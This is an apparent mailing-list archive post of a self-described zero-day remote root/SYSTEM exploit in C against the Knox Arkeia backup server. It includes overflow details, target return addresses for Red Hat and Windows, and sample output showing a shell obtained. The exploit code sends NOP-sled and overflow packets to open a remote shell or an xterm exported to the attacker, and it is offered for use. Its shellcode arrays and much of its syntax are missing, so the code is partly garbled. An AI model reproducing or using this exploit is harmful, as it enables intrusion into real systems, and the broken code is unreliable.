Knox Arkeia remote root/system exploit

[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]


0day cuz i'm bored

* Knox Arkeia Server Backup
* arkeiad local/remote root exploit
* Targets for Redhat 7.2/8.0, Win2k SP2/SP3/SP4, WinXP SP1, Win 2003 EE
* Works up to current version 5.3.x
* ---------------
* Linux x86:
* ./arksink2 <arkeia_host> <target_type> <display>
* Exports an xterm to the box of your choosing. Make sure to "xhost +" on
* the box you're exporting to.
* A stack overflow is in the processing of a type 77 request. EIP is actually
* overwritten at 64 bytes, but the trailing NULL scrambled a pointer so we
* have to write past EIP and insert a "safe" value. Put this value behind your
* NOP+sc return address so it doesn't mess with the sled.
* Since the buffer is so small, we initially send an invalid packet that ends
* up on the heap a second before the overflow happens. If it is a high traffic
* Arkeia server the heap might be a bit volatile, so play around with putting
* nops+sc after the overwritten pointer. The heap method avoids non-exec stack
* protection, however.
* Includes targets for RH8 and RH7.2
* [user@host user]$ ./prog 1
* [*] Knox Arkeia <= v5.3.x remote root/SYSTEM exploit
* [*] Attacking LINUX system
* [*] Exporting xterm to
* [*] Connected to NOP+shellcode socket
* [*] Connected to overflow socket
* [*] Sending nops+shellcode
* [*] Done, sleeping
* [*] Done, check for xterm
* ---------------
* Windows x86:
* ./prog <host> <target> <offset>
* Spawns a shell on port 80 of the remote host
* EIP is overwritten beginning with the 25th byte after the header. Since Windows
* is little endian and has the heap mapped to 0x00XXXXXX we can avoid having to
* write an extra null past EIP. Another advantage here is that we can put all our
* nops and shellcode in the same packet, but after the NULL. They will not be copied
* onto the stack (and therefore not munge the pointer after it) but will remain
* in memory as a raw packet. Fire up ollydbg, search for your nops and voila.
* [user@host user]$ ./arksink2 3 0
* [*] Knox Arkeia <= v5.3.x remote SYSTEM exploit
* [*] Attacking Windows system
* [*] Spawning shell on
* [*] Connected to overflow socket
* [*] Sending overflow
* [*] Attempting to get remote shell, try #0
* [!] connect: Resolver Error 0 (no error)
* [*] Attempting to get remote shell, try #1
* [!] connect: Resolver Error 0 (no error)
* [*] Attempting to get remote shell, try #2
* [!] connect: Resolver Error 0 (no error)
* [*] Attempting to get remote shell, try #3
* [!] connect: Resolver Error 0 (no error)
* [*] Attempting to get remote shell, try #4
* [*] Success, enjoy
* Microsoft Windows 2000 [Version 5.00.2195]
* (C) Copyright 1985-2000 Microsoft Corp.
* C:\WINNT\system32>whoami
* whoami
* C:\WINNT\system32>
* ---------------

Is your PC infected? Get a FREE online computer virus scan from McAfee® Security.
 * Knox Arkiea Server Backup
 * arkiead local/remote root exploit
 * Targets for Redhat 7.2/8.0, Win2k SP2/SP3/SP4, WinXP SP1, Win 2003 EE 
 * Works up to current version 5.3.x 
 * ---------------
 * Linux x86:
 * ./arksink2 <arkeia_host> <target_type> <display>
 * Exports an xterm to the box of your choosing.  Make sure to "xhost +" on
 * the box you're exporting to.
 * A stack overflow is in the processing of a type 77 request.  EIP is actually
 * overwritten at 64 bytes, but the trailing NULL scrambled a pointer so we
 * have to write past EIP and insert a "safe" value.  Put this value behind your
 * NOP+sc return address so it doesn't mess with the sled.
 * Since the buffer is so small, we initially send an invalid packet that ends
 * up on the heap a second before the overflow happens.  If it is a high traffic
 * Arkeia server the heap might be a bit volatile, so play around with putting
 * nops+sc after the overwritten pointer.  The heap method avoids non-exec stack
 * protection, however.
 * Includes targets for RH8 and RH7.2
 * [user@host user]$ ./prog 1
 * [*] Knox Arkeia <= v5.3.x remote root/SYSTEM exploit
 * [*] Attacking LINUX system
 * [*] Exporting xterm to 
 * [*] Connected to NOP+shellcode socket
 * [*] Connected to overflow socket
 * [*] Sending nops+shellcode
 * [*] Done, sleeping
 * [*] Done, check for xterm
 * ---------------
 * Windows x86:
 * ./prog <host> <target> <offset>
 * Spawns a shell on port 80 of the remote host
 * EIP is overwritten beginning with the 25th byte after the header.  Since Windows
 * is little endian and has the heap mapped to 0x00XXXXXX we can avoid having to
 * write an extra null past EIP.  Another advantage here is that we can put all our
 * nops and shellcode in the same packet, but after the NULL.  They will not be copied
 * onto the stack (and therefore not munge the pointer after it) but will remain
 * in memory as a raw packet.  Fire up ollydbg, search for your nops and voila.
 * [user@host user]$ ./arksink2 3 0
 * [*] Knox Arkeia <= v5.3.x remote SYSTEM exploit
 * [*] Attacking Windows system
 * [*] Spawning shell on
 * [*] Connected to overflow socket
 * [*] Sending overflow
 * [*] Attempting to get remote shell, try #0
 * [!] connect: Resolver Error 0 (no error)
 * [*] Attempting to get remote shell, try #1
 * [!] connect: Resolver Error 0 (no error)
 * [*] Attempting to get remote shell, try #2
 * [!] connect: Resolver Error 0 (no error)
 * [*] Attempting to get remote shell, try #3
 * [!] connect: Resolver Error 0 (no error)
 * [*] Attempting to get remote shell, try #4
 * [*] Success, enjoy
 * Microsoft Windows 2000 [Version 5.00.2195]
 * (C) Copyright 1985-2000 Microsoft Corp.
 * C:\WINNT\system32>whoami
 * whoami
 * C:\WINNT\system32>
 * ---------------

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <netdb.h>
#include <sys/socket.h>
#include <sys/errno.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <arpa/nameser.h>

#define BUFLEN		10000		/* for readshell()		*/
#define DATA_LEN	1000		/* overflow packet data section	*/
#define HEAD_LEN 	8		/* overflow packet header	*/
#define NOP_LEN		20000		/* nop+shellcode packet 	*/
#define	ARK_PORT	617		/* port Arkeiad listens on	*/
#define SHELL_PORT	80		/* for the windows shellcode	*/
#define NOP 		0x90		/* Intel x86			*/
#define NUMTARGS	5		/* increase when adding targets */
#define LINUX		1		/* Linux target type		*/
#define WINDOWS		2		/* Windows target type		*/

struct {
	char 		*os;
	unsigned int	targret;
	unsigned int	targsafe;
	unsigned int	len;
	int		targtype;
} targets[] = {
	{ "Redhat 8.0", 0x80ecf90, 0x080e0144, 68, LINUX },
	{ "Redhat 7.2", 0x80eddc0, 0x080eb940, 68, LINUX },
	{ "Windows 2k SP2, SP3, SP4", 0x007d2144, 0xdeadbeef, 28, WINDOWS },
	{ "Windows 2003 EE", 0x007b2178, 0xdeadbeef, 28, WINDOWS },
	{ "Windows XP SP1", 0x007d20e7, 0xdeadbeef, 28, WINDOWS },

// Linux shellcode exports xterm
const char shellcode[] =

// Windows shellcode binds shell to port 80
const char shellcode_win[] =

unsigned int resolve(char *hostname)
	u_long 	ip = 0;
	struct hostent	*hoste;

	if ((int)(ip = inet_addr(hostname)) == -1)
		if ((hoste = gethostbyname(hostname)) == NULL)
			herror("[!] gethostbyname");
		memcpy(&ip, hoste->h_addr, hoste->h_length);

int isock(char *hostname, int portnum)
	struct sockaddr_in	sock_a;
	int			num, sock;
	unsigned int		ip;
	fd_set			input;

	sock_a.sin_family = AF_INET;
	sock_a.sin_port = htons(portnum);
	sock_a.sin_addr.s_addr = resolve(hostname);

	if ((sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0)
		herror("[!] accept");
	if (connect(sock, (struct sockaddr *)&sock_a, sizeof(sock_a)))
		herror("[!] connect");

int usage(char *progname)
	int 	i;

	fprintf(stderr, "Usage:\n%s hostname target_num display  (attacking Linux)\n", progname);
	fprintf(stderr, "%s hostname target_num offset   (attacking Windows)\n", progname);
	for (i = 0; targets[i].os; i++)
		fprintf(stderr, "Target %d: %s\n", i+1, targets[i].os);
	fprintf(stderr, "Example: %s 1\n", progname);

int getshell(int sock)

	char	buf[BUFLEN];
	int	nread=0;

    		fd_set input; 

int lin(char *host, char *export, unsigned int tnum)

	char 		head[] 		= "\x00\x4d\x00\x03\x00\x01\xff\xff";
	char 		data[DATA_LEN];
	char		sc_req[NOP_LEN*2];
	char		*sc;
	unsigned int	retaddr;
	unsigned int	safe;
	int		datalen		= 0;
	int		port		= ARK_PORT;
	int		sock_overflow, sock_nops;
	int 		i;
	int		nullmap = 0;

	sock_overflow = sock_nops = 0;

	retaddr = targets[tnum].targret;
	safe = targets[tnum].targsafe;
	datalen = targets[tnum].len;

	sock_nops = isock(host, port);

	if (sock_nops < 1)
	fprintf(stderr, "[*] Connected to %s:%d NOP+shellcode socket\n", host, port);

	sock_overflow = isock(host, port);
	if (sock_overflow < 1)
	fprintf(stderr, "[*] Connected to %s:%d overflow socket\n", host, port);

	// build data section of overflow packet
	memset(data, NOP, DATA_LEN);

	// copy in return address
	memcpy(data+datalen - 8, (char *)&retaddr, 4);
	// we overwrite a pointer that must be a valid address
	memcpy(data+datalen-4, (char *)&safe, 4); 

	datalen = ntohs(datalen);
	memcpy(head+6, (char *)&datalen, 2);

	// build invalid packet with nops+shellcode
	memset(sc_req, NOP, NOP_LEN+1);
	sc = (char *)malloc(strlen(shellcode) + strlen(export) + 2);
	sprintf(sc, "%s%s%s", shellcode, export, "K");
	if (strlen(sc) + NOP_LEN > NOP_LEN*2-1) 
		fprintf(stderr, "[!] display name too long\n");

	memcpy(sc_req+NOP_LEN, sc, strlen(sc));

	// send invalid nop+shellcode packet
	fprintf(stderr, "[*] Sending nops+shellcode\n");
	write(sock_nops, sc_req, NOP_LEN+strlen(sc)+1); 
	fprintf(stderr, "[*] Done, sleeping\n");

	// send overflow, pointing EIP to above nops+sc
	write(sock_overflow, head, HEAD_LEN);	// 8 byte header
	datalen = ntohs(datalen);
	fprintf(stderr, "[*] Sending overflow\n");
	write(sock_overflow, data, datalen);	// small overflow packet
	fprintf(stderr, "[*] Done, check for xterm\n");


void windows (char *host, int tnum, int offset)
	char 		head[] 		= "\x00\x4d\x00\x03\x00\x01\xff\xff";
	char 		data[DATA_LEN];
	char		sc_req[NOP_LEN*2];
	char		*sc;
	char		*export;
	unsigned int	ret;
	unsigned int	safeaddr;
	int		overflow_len;
	int		datasiz		= DATA_LEN;
	int		datalen		= 0;
	int		port		= ARK_PORT;
	int		sock_overflow, sock_nops, sock_shell;
	int 		i;

	datalen = targets[tnum].len;
	ret = targets[tnum].targret + offset;
	sock_overflow = isock(host, port);
	if (sock_overflow < 1)
	fprintf(stderr, "[*] Connected to %s:%d overflow socket\n", host, port);

	// build data section of overflow packet
	memset(data, NOP, DATA_LEN);
	memcpy(data+datalen - 4, (char *)&ret, 4);
	memcpy(data+DATA_LEN-strlen(shellcode_win)-1, shellcode_win, strlen(shellcode_win));
	// put size into header
	datasiz = ntohs(datasiz);
	memcpy(head+6, (char *)&datasiz, 2);

	fprintf(stderr, "[*] Sending overflow\n");
	write(sock_overflow, head, HEAD_LEN);		// 8 byte header
	write(sock_overflow, data, DATA_LEN);		// large data section

	for (i = 0; i < 20; i++)
		fprintf(stderr, "[*] Attempting to get remote shell, try #%d\n", i);
		// connect to shell
		sock_shell = isock(host, SHELL_PORT);
		if (sock_shell > 0)
			fprintf(stderr, "[*] Success, enjoy\n");

	fprintf(stderr, "[!] Exploit failed or cannot connect to port 80\n");

int main( int argc, char **argv)

	/* first 2 bytes are a type 77 request */
	/* last two bytes length */
	char		*host;
	char		*export;
	unsigned int	tnum;
	int		datalen		= 0;
	int		offset		= 0;

	if (argc == 4)
		host = argv[1];
		tnum = atoi(argv[2]);

		if (targets[tnum].targtype == LINUX)
			export = argv[3];

		if (tnum > NUMTARGS || tnum == 0)
			fprintf(stderr, "[!] Invalid target\n");

	fprintf(stderr, "[*] Knox Arkeia <= v5.3.x remote root/SYSTEM exploit\n");
	fprintf(stderr, "[*] Attacking %s system\n", targets[tnum].os);

	if (targets[tnum].targtype == LINUX )
		fprintf(stderr, "[*] Exporting xterm to %s\n", export);
		lin(host, export, tnum);
	else if (targets[tnum].targtype == WINDOWS)
		fprintf(stderr, "[*] Spawning shell on %s:%d\n", host, SHELL_PORT);
		windows(host, tnum, offset);
		fprintf(stderr, "[!] Unknown target type: %d\n", targets[tnum].targtype);


[Index of Archives]     [Linux Security]     [Netfilter]     [PHP]     [Yosemite News]     [Linux Kernel]

  Powered by Linux